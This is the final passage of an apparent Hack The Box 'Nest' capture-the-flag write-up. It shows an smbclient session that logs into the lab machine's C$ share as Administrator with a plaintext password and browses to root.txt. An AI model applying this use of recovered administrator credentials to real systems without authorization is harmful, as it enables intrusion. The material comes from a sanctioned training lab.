root@kali:~/htb/nest# smbclient -U Administrator%XtH4nkS4Pl4y1nGX \\\\10.10.10.178\\C$ Domain=[HTB-NEST] OS=[] Server=[] Try "help" to get a list of possible commands. smb: \> ls $Recycle.Bin DHS 0 Mon Jul 13 22:34:39 2009 Boot DHS 0 Sat Jan 25 16:15:35 2020 bootmgr AHSR 383786 Fri Nov 19 23:40:08 2010 BOOTSECT.BAK AHSR 8192 Tue Aug 6 01:16:26 2019 Config.Msi DHS 0 Sat Jan 25 16:49:12 2020 Documents and Settings DHS 0 Tue Jul 14 01:06:44 2009 pagefile.sys AHS 2146881536 Tue Jun 9 16:59:51 2020 PerfLogs D 0 Mon Jul 13 23:20:08 2009 Program Files DR 0 Wed Aug 7 19:40:50 2019 Program Files (x86) DR 0 Tue Jul 14 01:06:53 2009 ProgramData DH 0 Mon Aug 5 16:24:41 2019 Recovery DHS 0 Mon Aug 5 16:22:25 2019 restartsvc.bat A 33 Wed Aug 7 19:43:09 2019 Shares D 0 Tue Aug 6 09:59:55 2019 System Volume Information DHS 0 Tue Aug 6 00:17:38 2019 Users DR 0 Thu Aug 8 13:19:40 2019 Windows D 0 Sat Jan 25 16:22:42 2020 10485247 blocks of size 4096. 6543143 blocks available smb: \> cd ./Users smb: \Users\> ls . DR 0 Thu Aug 8 13:19:40 2019 .. DR 0 Thu Aug 8 13:19:40 2019 Administrator D 0 Mon Aug 5 16:33:56 2019 All Users DHS 0 Tue Jul 14 01:06:44 2009 Default DHR 0 Tue Jul 14 02:38:21 2009 Default User DHS 0 Tue Jul 14 01:06:44 2009 desktop.ini AHS 174 Tue Jul 14 00:57:55 2009 Public DR 0 Tue Jul 14 00:57:55 2009 Service\_HQK D 0 Thu Aug 8 13:19:41 2019 TempUser D 0 Fri Aug 9 08:33:50 2019 10485247 blocks of size 4096. 6543143 blocks available smb: \Users\> cd ./Administrator\ smb: \Users\Administrator\> ls . D 0 Mon Aug 5 16:33:56 2019 .. D 0 Mon Aug 5 16:33:56 2019 AppData DH 0 Mon Aug 5 16:27:25 2019 Application Data DHS 0 Mon Aug 5 16:27:25 2019 Contacts DR 0 Sat Jan 25 17:02:44 2020 Cookies DHS 0 Mon Aug 5 16:27:25 2019 Desktop DR 0 Sun Jan 26 02:20:50 2020 Documents DR 0 Sat Jan 25 17:02:44 2020 Downloads DR 0 Sat Jan 25 17:02:44 2020 Favorites DR 0 Sat Jan 25 17:02:44 2020 Links DR 0 Sat Jan 25 17:02:44 2020 Local Settings DHS 0 Mon Aug 5 16:27:25 2019 Music DR 0 Sat Jan 25 17:02:44 2020 My Documents DHS 0 Mon Aug 5 16:27:25 2019 NetHood DHS 0 Mon Aug 5 16:27:25 2019 NTUSER.DAT AHS 786432 Sun Jan 26 02:31:38 2020 ntuser.dat.LOG1 AHS 262144 Tue Jun 9 17:24:53 2020 ntuser.dat.LOG2 AHS 0 Mon Aug 5 16:27:25 2019 NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf AHS 65536 Mon Aug 5 16:27:27 2019 NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms AHS 524288 Mon Aug 5 16:27:27 2019 NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms AHS 524288 Mon Aug 5 16:27:27 2019 ntuser.ini HS 20 Mon Aug 5 16:27:25 2019 Pictures DR 0 Sat Jan 25 17:02:44 2020 PrintHood DHS 0 Mon Aug 5 16:27:25 2019 Recent DHS 0 Mon Aug 5 16:27:25 2019 Saved Games DR 0 Sat Jan 25 17:02:44 2020 Searches DR 0 Sat Jan 25 17:02:44 2020 SendTo DHS 0 Mon Aug 5 16:27:25 2019 Start Menu DHS 0 Mon Aug 5 16:27:25 2019 Templates DHS 0 Mon Aug 5 16:27:25 2019 Videos DR 0 Sat Jan 25 17:02:44 2020 10485247 blocks of size 4096. 6543143 blocks available smb: \Users\Administrator\> cd ./Desktop smb: \Users\Administrator\Desktop\> ls . DR 0 Sun Jan 26 02:20:50 2020 .. DR 0 Sun Jan 26 02:20:50 2020 desktop.ini AHS 282 Sat Jan 25 17:02:44 2020 root.txt A 32 Mon Aug 5 18:27:26 2019 10485247 blocks of size 4096. 6543143 blocks available And we’re done with this box! This was a fun box, definitely different than what you would see on an easy box.
Hope this article was useful in any way! Thoughts and remarks are welcome!
Originally published at https://epliu_2555.hashnode.dev.
Top comments (0)